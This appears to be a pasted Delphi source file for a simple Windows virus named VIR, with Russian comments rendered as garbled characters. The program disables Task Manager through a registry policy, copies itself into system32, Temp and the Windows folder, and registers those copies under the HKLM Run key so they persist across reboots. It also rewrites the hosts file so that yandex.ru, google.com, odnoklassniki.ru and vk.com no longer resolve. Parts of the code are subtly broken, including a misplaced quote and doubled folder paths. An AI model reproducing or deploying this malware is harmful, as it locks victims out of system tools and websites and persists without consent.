· 7 years ago · Nov 16, 2018, 06:58 PM
1program VIR;
2
3uses sysutils, windows, Registry;
4
5 var
6Windir: string;
7WindirP: PChar;
8Res : Cardinal;
9Reg : TRegistry;
10host : TextFile;
11
12
13procedure LockTaskManager(Lock : Boolean = True);
14const
15 sKey = 'DisableTaskMgr';
16begin
17 with TRegistry.Create do
18 begin
19 RootKey := HKEY_CURRENT_USER;
20 if not OpenKey('\Software\Microsoft\Windows\CurrentVersion\Policies\System', True) then Exit;
21 if Lock then WriteString(sKey, '1') else WriteString(sKey, '100');
22 CloseKey;
23 Free;
24 end;
25end;
26
27 begin
28LockTaskManager();
29WinDirP := StrAlloc(MAX_PATH);
30Res := GetWindowsDirectory(WinDirP, MAX_PATH);
31if Res > 0 then
32WinDir := StrPas(WinDirP);
33
34if not FileExists(Windir + '\Windows\System32\vir.exe') then //поиÑк тела вируÑа и копирование, еÑли они не найдены
35begin
36CopyFile(PChar('vir.exe'), PChar(Windir + '\system32\'+'vir.exe'), false);
37end;
38if not FileExists(Windir + '\Windows\Temp\vir.exe') then
39begin
40CopyFile(PChar('vir.exe'), PChar(Windir + '\Temp\'+'vir.exe'), false);
41end;
42if not FileExists('Windir + '\Windows\vir.exe') then
43begin
44CopyFile(PChar('vir.exe'), PChar(Windir + '\vir.exe'), false);
45end ;
46
47begin
48Reg:=TRegistry.create;
49Reg.RootKey := HKEY_LOCAL_MACHINE;
50Reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',false);
51Reg.ValueExists('Vir') ;
52Reg.LazyWrite := True;
53Reg.WriteString('Vir1',Windir + '\system32\'+'vir.exe');
54Reg.WriteString('Vir2',Windir + '\Temp\'+'vir.exe');
55Reg.WriteString('Vir3',Windir + '\vir.exe');
56
57Reg.CloseKey;
58Reg.free;
59
60AssignFile(host, pchar(Windir+'\system32\drivers\etc\hosts'));//открытие файла hosts
61Append(host);
62WriteLn(host,'');
63WriteLn(host,'127.0.0.1 yandex.ru');
64WriteLn(host,'127.0.0.1 google.com');
65WriteLn(host,'127.0.0.1 odnoklassniki.ru');
66WriteLn(host,'127.0.0.1 vk.com');
67CloseFile(host);
68end;
69end.
70end.